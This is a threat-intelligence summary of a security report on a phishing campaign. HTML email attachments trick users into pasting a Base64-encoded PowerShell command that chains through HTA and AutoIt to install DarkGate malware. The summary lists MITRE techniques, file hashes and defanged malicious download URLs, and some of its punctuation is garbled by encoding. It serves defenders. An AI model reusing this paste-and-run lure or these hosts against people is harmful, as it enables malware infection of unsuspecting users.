Two sentences summarizing the content: ASEC researchers found phishing emails distributing HTML attachments that urge recipients to paste commands to run them, leading to a multi-stage infection that drops DarkGate via PowerShell, HTA, and AutoIt components. The campaign downloads payloads from C2, decodes commands from Base64, and uses clipboard manipulation to obscure execution. #DarkGate #PowerShell #HTA #AutoIt #ASEC #HTMLPhishing
Keypoints
- The threat actor distributes phishing HTML attachments via email to prompt users to open them and take action.
- The emails simulate legitimate topics (fee processing, operation instruction reviews) to coax recipients into opening attachments.
- Opening the HTML leads to a background message mimicking MS Word and prompts the user to click a button to view content offline.
- On consent, users go through a sequence: Win+R β CTRL+V β Enter, while the PowerShell command is Base64-encoded and saved to the clipboard.
- The PowerShell script downloads an HTA file from a C2 and executes it, while clearing the clipboard to obscure the command.
- HTA launches the PowerShell command from the C2, and AutoIt (inside a ZIP) runs a script (script.a3x) as part of the infection chain, culminating in DarkGate malware.
- Detected file types and IOCs include multiple HTA/HTML/PowerShell artifacts and a list of download URLs linked to the campaign.
MITRE Techniques
- [T1566.001] Phishing: Attachment β The attacker distributes phishing HTML attachments that prompt users to take action. βThe threat actor sent emails about fee processing, operation instruction reviews, etc. to prompt recipients to open the attachments.β
- [T1204] User Execution β The recipient is guided to click through prompts to view content and run commands. βThe message tells the user to click the βHow to fixβ button to view the Word document offline.β
- [T1059.001] PowerShell β The malicious PowerShell command is executed as part of the infection flow. βThe malicious PowerShell command (see Figure 4) β¦ is decoded and saved into the userβs clipboard.β
- [T1140] Deobfuscate/Decode Files or Information β Base64-encoded PowerShell payload decoded during execution. βBase64-encoded by the JavaScript (see Figure 3) is decoded and saved into the userβs clipboard.β
- [T1105] Ingress Tool Transfer β The payloads are downloaded from a C2 during the infection chain. βThe PowerShell command downloads an HTA file from C2 and executes it.β
- [T1218.005] HTA β The download and execution flow leverages an HTA to run the PowerShell command from the C2. βHTA executes the PowerShell command in C2.β
- [T1059] Command and Scripting Interpreter β AutoIt script execution via the ZIP-delivered tool (script.a3x) represents scripting interpreter use. βAutoit3.exe inside the ZIP file uses the compiled malicious AutoIt script (script.a3x) as an argument to be executed.β
Indicators of Compromise
- [File hash] 8b788345fe1a3e9070e2d2982c1f1eb2 β html file used in the initial delivery
- [File hash] 404bd47f17d482e139e64d0106b8888d β script.a3x detected in the payload chain
- [File hash] 30e2442555a4224bf15bbffae5e184ee β dark.hta involved in the dropper chain
- [File hash] 4d52ea9aa7cd3a0e820a9421d936073f β another HTML artifact in the campaign
- [Filename] script.a3x β invoked by AutoIt component during execution
- [Filename] dark.hta β HTA component downloaded from C2
- [Filename] 1.hta β additional HTA artifact observed in IOCs
- [URL] hxxps://jenniferwelsh[.]com/header.png β one of the download indicators
- [URL] hxxp://mylittlecabbage[.]net/qhsddxna β another download indicator
Read more: https://asec.ahnlab.com/en/66300/